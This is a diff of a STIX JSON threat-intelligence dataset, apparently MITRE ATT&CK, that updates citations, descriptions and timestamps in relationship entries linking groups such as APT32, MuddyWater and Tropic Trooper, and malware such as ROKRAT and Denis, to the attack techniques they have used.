+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used a custom tool for creating reverse shells.(Citation: Symantec MuddyWater Dec 2018) [MuddyWater](https://attack.mitre.org/groups/G0069) has used JavaScript files to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)",
"id": "relationship--3ab6b7bc-bb49-4fcd-83fc-abbec5912d41",
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"type": "relationship",
- "modified": "2020-03-20T02:35:58.078Z",
+ "modified": "2020-05-29T01:24:37.175Z",
"created": "2019-01-30T17:33:40.960Z"
},
{
@@ -91198,32 +92350,6 @@
"modified": "2020-03-20T17:43:32.421Z",
"created": "2019-01-29T18:55:20.843Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "external_references": [
- {
- "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.",
- "url": "https://www.cybereason.com/blog/operation-cobalt-kitty-apt",
- "source_name": "Cybereason Oceanlotus May 2017"
- },
- {
- "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
- "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
- "source_name": "Cybereason Cobalt Kitty 2017"
- }
- ],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has used port 80 for C2 communications.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)",
- "id": "relationship--c70a03fe-b06f-41b5-bd0c-a7c4d0b1c31e",
- "source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
- "type": "relationship",
- "modified": "2019-07-17T13:11:38.033Z",
- "created": "2019-01-31T01:07:58.727Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -91426,14 +92552,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--c21d5a77-d422-4a69-acd7-2c53c1faa34b",
"type": "relationship",
- "modified": "2020-03-16T17:37:15.771Z",
+ "modified": "2020-06-29T01:54:53.449Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -91585,15 +92711,15 @@
{
"id": "relationship--43809fa9-dbe2-4429-875e-f0828563d6aa",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has collected the OS version and computer name from victims. One of the group's backdoors can also query the Windows Registry to gather system information, and another macOS backdoor performs a fingerprint of the machine on its first connection to the C&C server.(Citation: ESET OceanLotus)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has collected the OS version and computer name from victims. One of the group's backdoors can also query the Windows Registry to gather system information, and another macOS backdoor performs a fingerprint of the machine on its first connection to the C&C server. [APT32](https://attack.mitre.org/groups/G0050) executed shellcode to identify the name of the infected host.(Citation: ESET OceanLotus)(Citation: ESET OceanLotus Mar 2019)(Citation: ESET OceanLotus macOS April 2019)(Citation: FireEye APT32 April 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/",
+ "source_name": "ESET OceanLotus",
"description": "Folt\u00fdn, T. (2018, March 13). OceanLotus ships new backdoor using old tricks. Retrieved May 22, 2018.",
- "source_name": "ESET OceanLotus"
+ "url": "https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/"
},
{
"description": "Dumont, R. (2019, March 20). Fake or Fake: Keeping up with OceanLotus decoys. Retrieved April 1, 2019.",
@@ -91604,13 +92730,18 @@
"source_name": "ESET OceanLotus macOS April 2019",
"url": "https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/",
"description": "Dumont, R.. (2019, April 9). OceanLotus: macOS malware update. Retrieved April 15, 2019."
+ },
+ {
+ "source_name": "FireEye APT32 April 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html",
+ "description": "Henderson, S., et al. (2020, April 22). Vietnamese Threat Actors APT32 Targeting Wuhan Government and Chinese Ministry of Emergency Management in Latest Example of COVID-19 Related Espionage. Retrieved April 28, 2020."
}
],
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2019-07-17T13:11:38.190Z",
+ "modified": "2020-06-19T20:04:12.572Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -91645,14 +92776,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541",
"type": "relationship",
- "modified": "2020-03-16T17:37:15.779Z",
+ "modified": "2020-06-29T01:54:53.447Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -91690,12 +92821,12 @@
"url": "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf"
}
],
- "source_ref": "malware--fb575479-14ef-41e9-bfab-0b7cf10bec73",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-01-16T16:13:52.465Z"
+ "created": "2018-01-16T16:13:52.465Z",
+ "source_ref": "malware--fb575479-14ef-41e9-bfab-0b7cf10bec73",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -92150,7 +93281,7 @@
{
"id": "relationship--536ed2f4-46c5-4485-998c-60f0480d5c21",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) lists the current running processes on the system.(Citation: Talos ROKRAT)",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) lists the current running processes on the system.(Citation: Talos ROKRAT)(Citation: NCCGroup RokRat Nov 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -92159,13 +93290,18 @@
"url": "https://blog.talosintelligence.com/2017/04/introducing-rokrat.html",
"description": "Mercer, W., Rascagneres, P. (2017, April 03). Introducing ROKRAT. Retrieved May 21, 2018.",
"source_name": "Talos ROKRAT"
+ },
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
}
],
"source_ref": "malware--60a9c2f0-b7a5-4e8e-959c-e1a3ff314a5f",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2019-07-26T22:56:58.492Z",
+ "modified": "2020-05-21T17:07:02.767Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -92498,16 +93634,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.055Z",
+ "modified": "2020-05-12T22:13:17.028Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -92559,12 +93695,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "tool--c11ac61d-50f4-444f-85d8-6f006067f0de",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--c11ac61d-50f4-444f-85d8-6f006067f0de",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0"
},
{
"id": "relationship--ab687dca-2741-4920-a71e-e0e0444809c5",
@@ -92627,12 +93763,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--211cfe9f-2676-4e1c-a5f5-2c8091da2a68",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1"
},
{
"id": "relationship--c935fb02-a2a4-448e-adc0-2b220fc8d521",
@@ -93042,15 +94178,20 @@
"source_name": "Securelist Denis April 2017",
"url": "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/",
"description": "Shulmin, A., Yunakovsky, S. (2017, April 28). Use of DNS Tunneling for C&C Communications. Retrieved November 5, 2018."
+ },
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
}
],
- "description": "[Denis](https://attack.mitre.org/software/S0354) collects the username from the victim\u2019s machine.(Citation: Securelist Denis April 2017)",
+ "description": "[Denis](https://attack.mitre.org/software/S0354) enumerates and collects the username from the victim\u2019s machine.(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)",
"id": "relationship--b47d8f5e-7c09-4f40-a5a8-ccce10a8363b",
"source_ref": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
"relationship_type": "uses",
"target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
- "modified": "2019-04-24T20:56:04.677Z",
+ "modified": "2020-06-19T20:39:21.911Z",
"created": "2019-01-30T20:01:45.535Z"
},
{
@@ -93088,12 +94229,12 @@
"url": "https://technet.microsoft.com/en-us/library/bb491010.aspx"
}
],
- "source_ref": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -93518,12 +94659,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -93965,25 +95106,15 @@
"description": "Lee, B. and Falcone, R. (2017, February 15). Magic Hound Campaign Attacks Saudi Targets. Retrieved December 27, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
},
- {
- "source_name": "Secureworks Cobalt Gypsy Feb 2017",
- "description": "Counter Threat Unit Research Team. (2017, February 15). Iranian PupyRAT Bites Middle Eastern Organizations. Retrieved December 27, 2017.",
- "url": "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations"
- },
- {
- "source_name": "SecureWorks Mia Ash July 2017",
- "description": "Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.",
- "url": "https://www.secureworks.com/research/the-curious-case-of-mia-ash"
- },
{
"source_name": "FireEye APT35 2018",
"description": "Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018.",
"url": "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf"
}
],
- "description": "(Citation: Unit 42 Magic Hound Feb 2017)(Citation: Secureworks Cobalt Gypsy Feb 2017)(Citation: SecureWorks Mia Ash July 2017)(Citation: FireEye APT35 2018)",
+ "description": "(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)",
"type": "relationship",
- "modified": "2019-09-09T19:21:42.601Z",
+ "modified": "2020-05-27T21:46:31.627Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -94021,17 +95152,17 @@
"url": "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/"
}
],
- "source_ref": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "tool--90ec2b22-7061-4469-b539-0989ec4f96c2",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18"
},
{
"id": "relationship--7d115073-c008-4394-867d-07c385d3db87",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent Word OLE compound documents with malicious obfuscated VBA macros that will run upon user execution and executed JavaScript scriptlets on the victim's machine.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: Group IB Cobalt Aug 2017)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)",
+ "description": "[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent Word OLE compound documents with malicious obfuscated VBA macros that will run upon user execution.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: Group IB Cobalt Aug 2017)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -94069,9 +95200,9 @@
],
"source_ref": "intrusion-set--dc6fe6ee-04c2-49be-ba3d-f38d2463c02a",
"relationship_type": "uses",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"type": "relationship",
- "modified": "2020-03-20T15:40:43.307Z",
+ "modified": "2020-06-23T19:41:51.997Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -94283,15 +95414,25 @@
"source_name": "CitizenLab Tropic Trooper Aug 2018",
"url": "https://citizenlab.ca/2018/08/familiar-feeling-a-malware-campaign-targeting-the-tibetan-diaspora-resurfaces/",
"description": "Alexander, G., et al. (2018, August 8). Familiar Feeling: A Malware Campaign Targeting the Tibetan Diaspora Resurfaces. Retrieved June 17, 2019."
+ },
+ {
+ "source_name": "Anomali Pirate Panda April 2020",
+ "url": "https://www.anomali.com/blog/anomali-suspects-that-china-backed-apt-pirate-panda-may-be-seeking-access-to-vietnam-government-data-center#When:15:00:00Z",
+ "description": "Moore, S. et al. (2020, April 30). Anomali Suspects that China-Backed APT Pirate Panda May Be Seeking Access to Vietnam Government Data Center. Retrieved May 19, 2020."
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) sent spearphishing emails that contained malicious Microsoft Office attachments.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro TropicTrooper 2015)(Citation: CitizenLab Tropic Trooper Aug 2018)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) sent spearphishing emails that contained malicious Microsoft Office and fake installer file attachments.(Citation: Unit 42 Tropic Trooper Nov 2016)(Citation: TrendMicro TropicTrooper 2015)(Citation: CitizenLab Tropic Trooper Aug 2018)(Citation: Anomali Pirate Panda April 2020)(Citation: TrendMicro Tropic Trooper May 2020)",
"id": "relationship--0be962d8-6281-4554-ad1f-4cba04c547de",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.214Z",
+ "modified": "2020-05-21T12:59:00.645Z",
"created": "2019-01-29T20:17:49.311Z"
},
{
@@ -94308,12 +95449,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html"
}
],
- "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--0ced8926-914e-4c78-bc93-356fb90dbd1f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580"
},
{
"id": "relationship--e2e35a7a-3057-4955-9e7e-c3972e0ad423",
@@ -94871,13 +96012,13 @@
"description": "The DigiTrust Group. (2017, January 12). The Rise of Agent Tesla. Retrieved November 5, 2018."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) collects account information from the victim\u2019s machine.(Citation: DigiTrust Agent Tesla Jan 2017)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can collect account information from the victim\u2019s machine.(Citation: DigiTrust Agent Tesla Jan 2017)",
"id": "relationship--0d93e75b-e13d-4bd5-97d2-b4f8d05e9efd",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--25659dd6-ea12-45c4-97e6-381e3e4b593e",
"type": "relationship",
- "modified": "2020-03-18T19:25:30.247Z",
+ "modified": "2020-05-28T23:41:03.886Z",
"created": "2019-01-29T18:44:05.065Z"
},
{
@@ -95039,23 +96180,28 @@
],
"external_references": [
{
- "source_name": "Cybereason Oceanlotus May 2017",
+ "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018.",
"url": "https://www.cybereason.com/blog/operation-cobalt-kitty-apt",
- "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018."
+ "source_name": "Cybereason Oceanlotus May 2017"
},
{
"source_name": "Securelist Denis April 2017",
"url": "https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/",
"description": "Shulmin, A., Yunakovsky, S. (2017, April 28). Use of DNS Tunneling for C&C Communications. Retrieved November 5, 2018."
+ },
+ {
+ "url": "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf",
+ "description": "Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.",
+ "source_name": "Cybereason Cobalt Kitty 2017"
}
],
- "description": "[Denis](https://attack.mitre.org/software/S0354) has used DNS tunneling for C2 communications.(Citation: Cybereason Oceanlotus May 2017)(Citation: Securelist Denis April 2017)",
+ "description": "[Denis](https://attack.mitre.org/software/S0354) has used DNS tunneling for C2 communications.(Citation: Cybereason Oceanlotus May 2017)(Citation: Securelist Denis April 2017)(Citation: Cybereason Cobalt Kitty 2017)",
"id": "relationship--01eb6d18-bb7b-4e4a-b133-60407f40773b",
"source_ref": "malware--f25aab1a-0cef-4910-a85d-bb38b32ea41a",
"relationship_type": "uses",
"target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72",
"type": "relationship",
- "modified": "2020-03-17T00:54:31.427Z",
+ "modified": "2020-06-19T20:39:21.916Z",
"created": "2019-01-30T20:01:45.452Z"
},
{
@@ -95355,12 +96501,12 @@
],
"description": "[AuditCred](https://attack.mitre.org/software/S0347) has used Port Number 443 for C2 communications.(Citation: TrendMicro Lazarus Nov 2018)",
"id": "relationship--894666a8-f37a-4c72-a61e-c130bc6ac197",
- "source_ref": "malware--24b4ce59-eaac-4c8b-8634-9b093b7ccd92",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2019-01-30T15:47:41.383Z",
- "created": "2019-01-30T15:47:41.383Z"
+ "created": "2019-01-30T15:47:41.383Z",
+ "source_ref": "malware--24b4ce59-eaac-4c8b-8634-9b093b7ccd92",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -95395,18 +96541,23 @@
"source_name": "Securelist MuddyWater Oct 2018"
},
{
- "source_name": "ClearSky MuddyWater Nov 2018",
+ "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018.",
"url": "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf",
- "description": "ClearSky Cyber Security. (2018, November). MuddyWater Operations in Lebanon and Oman: Using an Israeli compromised domain for a two-stage campaign. Retrieved November 29, 2018."
+ "source_name": "ClearSky MuddyWater Nov 2018"
+ },
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
}
],
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can upload additional files to the victim\u2019s machine.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater Nov 2018)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware that can upload additional files to the victim\u2019s machine.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Reaqta MuddyWater November 2017)",
"id": "relationship--82d8c106-c216-4d3f-9028-5f0b975e6330",
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2019-06-28T15:30:58.768Z",
+ "modified": "2020-05-29T01:24:37.227Z",
"created": "2019-01-30T17:33:40.964Z"
},
{
@@ -95512,12 +96663,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2005-081910-3934-99"
}
],
- "source_ref": "malware--b42378e0-f147-496f-992a-26a49705395b",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--b42378e0-f147-496f-992a-26a49705395b",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0"
},
{
"id": "relationship--67e6b603-a45d-4cbc-9b3e-546392934f7f",
@@ -95620,13 +96771,13 @@
"source_name": "Cybereason Cobalt Kitty 2017"
}
],
- "description": "[APT32](https://attack.mitre.org/groups/G0050) installed a backdoor macro in Microsoft Outlook for persistence.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) have replaced Microsoft Outlook's VbaProject.OTM file to install a backdoor macro for persistence.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)",
"id": "relationship--e1f7179b-37ac-4f47-8368-0f55814a6447",
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53",
"type": "relationship",
- "modified": "2019-07-17T13:11:38.422Z",
+ "modified": "2020-06-29T21:45:35.957Z",
"created": "2019-01-31T01:07:58.720Z"
},
{
@@ -95650,9 +96801,9 @@
"id": "relationship--3d661b40-6ebf-470f-a675-142f86b6c649",
"source_ref": "intrusion-set--96e239be-ad99-49eb-b127-3007b8c1bec9",
"relationship_type": "uses",
- "target_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852",
+ "target_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995",
"type": "relationship",
- "modified": "2019-12-20T14:23:29.294Z",
+ "modified": "2020-06-24T00:32:56.513Z",
"created": "2019-01-31T02:11:53.932Z"
},
{
@@ -95814,18 +96965,23 @@
],
"external_references": [
{
- "source_name": "Symantec MuddyWater Dec 2018",
+ "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018.",
"url": "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group",
- "description": "Symantec DeepSight Adversary Intelligence Team. (2018, December 10). Seedworm: Group Compromises Government Agencies, Oil & Gas, NGOs, Telecoms, and IT Firms. Retrieved December 14, 2018."
+ "source_name": "Symantec MuddyWater Dec 2018"
+ },
+ {
+ "source_name": "Reaqta MuddyWater November 2017",
+ "url": "https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/",
+ "description": "Reaqta. (2017, November 22). A dive into MuddyWater APT targeting Middle-East. Retrieved May 18, 2020."
}
],
